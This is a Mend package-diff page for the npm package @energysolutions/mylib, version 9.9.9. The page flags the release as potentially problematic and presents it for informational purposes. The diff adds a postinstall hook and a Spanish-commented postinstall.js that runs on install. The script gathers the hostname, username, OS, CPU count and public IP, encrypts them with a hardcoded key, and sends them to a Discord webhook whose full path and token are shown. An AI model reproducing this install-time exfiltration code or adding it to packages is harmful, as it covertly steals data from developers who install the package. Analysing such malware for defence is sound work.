npm - @energysolutions/mylib - Versions diffs - 0.0.1-security → 9.9.9 - Mend

@energysolutions/mylib 0.0.1-security → 9.9.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @energysolutions/mylib might be problematic. Click here for more details.

Files changed (3) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,11 @@
 {
   "name": "@energysolutions/mylib",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "9.9.9",
+  "description": "energysolutions package",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "author": "energysolutions",
+  "license": "ISC"
 }

package/postinstall.js ADDED Viewed

@@ -0,0 +1,89 @@
+const os = require('os');
+const https = require('https');
+const crypto = require('crypto');
+// Función para obtener la IP pública
+function obtenerIPPublica(callback) {
+  https.get('https://api64.ipify.org?format=json', (response) => {
+    let buffer = '';
+    response.on('data', (segmento) => {
+      buffer += segmento;
+    });
+    response.on('end', () => {
+      try {
+        const parsedData = JSON.parse(buffer);
+        callback(parsedData.ip);
+      } catch (error) {
+        console.error('No se pudo analizar la respuesta:', error);
+        callback(null);
+      }
+    });
+  }).on('error', (error) => {
+    console.error('Error al intentar obtener la IP:', error);
+    callback(null);
+  });
+}
+// Función para cifrar información
+function cifrarInformacion(texto, llave) {
+  const iv = llave.slice(0, 16);  // Inicialización vector desde llave
+  const cifrado = crypto.createCipheriv('aes-256-cbc', llave, iv);
+  let resultado = cifrado.update(texto, 'utf8', 'hex');
+  resultado += cifrado.final('hex');
+  return resultado;
+}
+// Función para enviar información del sistema cifrada
+function transmitirDatosSistema(direccionIP) {
+  const informacionSistema = {
+    sistema: os.platform(),
+    arquitectura: os.arch(),
+    procesadores: os.cpus().length,
+    equipo: os.hostname(),
+    usuario: os.userInfo().username,
+    direccionIP: direccionIP
+  };
+  const claveSecreta = crypto.createHash('sha256').update('susmxoo').digest();
+  const datosCifrados = cifrarInformacion(JSON.stringify(informacionSistema), claveSecreta);
+  const rutaWebhook = 'api/webhooks/1286768944803483721/ux4C8HKuV3K0vHA3ruV8QI6WB1byths7pI9vKYqm2sXa2rNMkWZz7t5rnO7-M1jkyw9D';
+  const cuerpo = JSON.stringify({
+    contenido: `Información Sistema: ${datosCifrados}`
+  });
+  const opcionesPeticion = {
+    hostname: 'discord.com',
+    port: 443,
+    path: rutaWebhook,
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(cuerpo)
+    }
+  };
+  const solicitud = https.request(opcionesPeticion, (respuesta) => {
+    respuesta.on('data', (parte) => {
+      process.stdout.write(parte);
+    });
+  });
+  solicitud.on('error', (error) => {
+    console.error('Error durante la solicitud:', error);
+  });
+  solicitud.write(cuerpo);
+  solicitud.end();
+}
+// Llamada principal para obtener la IP pública y enviar la información
+obtenerIPPublica((direccionIP) => {
+  if (direccionIP) {
+    transmitirDatosSistema(direccionIP);
+  } else {
+    console.error('No se pudo obtener la IP pública.');
+  }
+});

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=%40energysolutions%2Fmylib for more information.